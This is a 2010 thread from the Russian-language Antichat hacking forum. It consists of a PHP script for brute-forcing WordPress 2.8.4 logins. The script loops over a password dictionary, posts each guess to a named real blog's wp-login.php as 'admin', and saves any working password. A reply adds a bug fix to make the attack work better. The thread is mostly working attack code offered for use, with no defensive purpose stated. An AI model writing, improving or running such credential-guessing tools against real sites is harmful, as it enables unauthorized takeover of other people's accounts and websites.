ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Брут WordPress 2.8.4
  #1  
Старый 06.01.2010, 13:46
Аватар для Xmas_Maniac
Xmas_Maniac
Новичок
Регистрация: 03.01.2010
Сообщений: 2
Провел на форуме:
5363

Репутация: 5
По умолчанию Брут WordPress 2.8.4

PHP код:
<?php 
/* 
WordPress brute 
Tested on WordPress 2.8.4 russian 
================================== 
visit http://wordpress.org/ 
*/ 
/* Console PHP version */ 
    
$blogaddr="http://blog.aplus.by/"
    
$login="admin"
    
$dict="dict.txt"

    
$pwds=file($dict); 
    
$fg=fopen("good.txt","w"); 
     
    foreach (
$pwds as $pass
    { 
        
$post="log=".$login."&pwd=".$pass."&wp-submit=Login&redirect_to=".$blogaddr."wp-admin/&testcookie=1"
        
$ch=curl_init($blogaddr."wp-login.php"); 
        
CURL_SETOPT($chCURLOPT_POST1); 
        
CURL_SETOPT($chCURLOPT_POSTFIELDS$post); 
        
CURL_SETOPT($chCURLOPT_COOKIEFILE"cookie.txt"); 
        
CURL_SETOPT($chCURLOPT_COOKIEJAR"cookie.txt"); 
        
CURL_SETOPT($chCURLOPT_HEADER0); 
        
CURL_SETOPT($chCURLOPT_URL$blogaddr."wp-login.php"); 
        
CURL_SETOPT($chCURLOPT_RETURNTRANSFER1); 
        
CURL_SETOPT($chCURLOPT_FOLLOWLOCATIONtrue); 
        
$result=curl_exec($ch); 
        
curl_close($ch); 
        if (
strstr($result,"wpOnload")) { 
        
fwrite($fg,"good: $login : $pass"); exit; } 
    } 
    
fclose($fg); 
/*  */ 
?>
$blogaddr – Переменная, в которой хранится адрес блога.
$login – Логин.
$dict – Имя файла словаря.
 
Ответить с цитированием

  #2  
Старый 06.01.2010, 15:18
Аватар для b3
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Пароли берутся из файла и не обрабатываются функцией trim(), исправь
PHP код:
$pwds file($dict);
$pwds array_map('trim'$pwds); 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Брут Форс Garena Bel_kin Покупка, продажа, услуги в Соц. Сетях 4 22.09.2009 16:52
Брут не брутит! SCH666 ICQ 15 31.03.2009 04:04
Предоставлю проверку уязвимостей и брут по Ip диапазону Allont О Работе 0 15.01.2009 16:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ